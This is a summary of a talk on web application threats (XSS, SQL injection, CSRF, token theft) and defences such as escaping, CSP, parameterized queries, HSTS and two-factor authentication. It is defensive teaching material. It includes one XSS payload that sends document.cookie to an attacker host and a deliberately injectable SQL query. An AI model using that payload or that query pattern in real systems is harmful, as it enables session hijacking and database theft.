Web Application Security Threats and Mitigation Strategies

The presentation, originally delivered by Jiang Haitao, a senior technical expert at Alibaba International, focuses on the alarming prevalence of web‑application‑layer attacks and offers a comprehensive set of defensive measures.

Major Web Threats

1. Cross‑Site Scripting (XSS)

XSS allows malicious scripts to run in a victim's browser. It is divided into DOM‑based, reflected, and stored XSS. Example of a vulnerable innerHTML assignment:

document.getElementById("id").innerHTML = "Hello,
" + name + "
";

Another exploit sends cookies to a remote server:

new Image().src = "http://ha.cker.club/collectcookie.do?c=" + encodeURIComponent(document.cookie);

Consequences include session hijacking, internal network scanning via XHR/WebSocket, and data exfiltration.

2. SQL Injection

Concatenating untrusted input into SQL statements (e.g., String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'"; ) enables attackers to modify or dump databases.

3. CSRF

Cross‑Site Request Forgery tricks a logged‑in user into performing unwanted actions, such as logging out or transferring money, by exploiting automatic cookie transmission.

4. Transmission Hijacking

DNS hijacking, router compromise, and insecure public Wi‑Fi allow attackers to redirect traffic, inject malicious content, or perform man‑in‑the‑middle attacks.

5. Credential Leakage

Large‑scale password dumps (e.g., LinkedIn) illustrate the risk of users reusing weak passwords across sites.

6. Brute‑Force Cracking

Automated password guessing, often aided by leaked credential databases, can compromise accounts and expose internal information.

7. Token Theft

Stealing cookies or other authentication tokens via XSS gives attackers direct access to user sessions.

Mitigation Strategies

1. Proper Escaping

Use libraries such as ESAPI or AntiXSS to escape characters like & < > ' " / in HTML, URLs, and JavaScript. Consider HTML sanitizers (e.g., rickdom) for innerHTML usage.

2. Content Security Policy (CSP)

Deploy CSP2 to restrict inline scripts, enforce nonces or hashes, and sandbox iframes. Example header: Content‑Security‑Policy: default-src 'self'; script-src 'self' 'nonce-xyz';

3. Parameterized Queries

Avoid string concatenation; use prepared statements or ORM bindings. Tools like Alibaba’s Druid can detect injection attempts.

4. CSRF Tokens

Include a random token in forms or cookies and verify it server‑side. The IETF draft for First‑Party‑Only cookies further hardens CSRF defenses.

5. HTTPS & HSTS

Enforce TLS with up‑to‑date OpenSSL, disable weak ciphers, and publish HSTS headers ( Strict-Transport-Security: max-age=31536000; includeSubDomains ) to prevent protocol‑downgrade attacks.

6. HPKP (Public Key Pinning)

Pin trusted certificate hashes to mitigate rogue‑CA or compromised‑certificate scenarios.

7. Secure Password Storage

Store passwords with strong, salted hashes such as bcrypt, scrypt, or PBKDF2. Avoid plain MD5/SHA1.

8. Two‑Factor Authentication

Implement OTP via SMS, email, hardware tokens, or TOTP (RFC 6238). Major services (Google, Apple, GitHub) already support it.

9. Token Protection

Mark authentication cookies as HttpOnly and Secure , bind tokens to devices, and consider token‑binding drafts.

Selected Q&A Highlights

Q1: Small companies should use professional white‑box testing tools (e.g., OWASP ZAP) or outsource to reputable security firms.

Q2: Prevent man‑in‑the‑middle attacks on mobile apps by enforcing HTTPS with strong cipher suites and certificate pinning.

Q3: Mobile clients must validate server certificates manually (e.g., using AFNetworking’s SSL pinning).

Q4‑6: SHA‑1 with per‑user salts is weak; migrate to bcrypt/scrypt/PBKDF2 with high iteration counts.

Q7: Defend against enumeration by rate‑limiting login attempts and using HMAC‑SHA identifiers for order IDs.

Q8‑9: Local storage attacks stem from unsafe innerHTML or Flash LSO; use sandboxed iframes and avoid insecure plugins.

Q10‑12: Use HTTPS with signature verification for APK distribution; consider keyless SSL for CDN deployments.

Q13‑14: Password‑less login often relies on email verification and TOTP; enforce two‑factor authentication for email accounts.

Q15‑16: Encrypt local data with SQLCipher; use HMAC‑SHA256 or RSA‑SHA signatures for API integrity.

Q17: Refer to OWASP Top Ten, OWASP Testing Guide, and related cheat sheets for systematic security practices.

For further discussion, readers are invited to join the “High‑Availability Architecture” community via the provided contact information.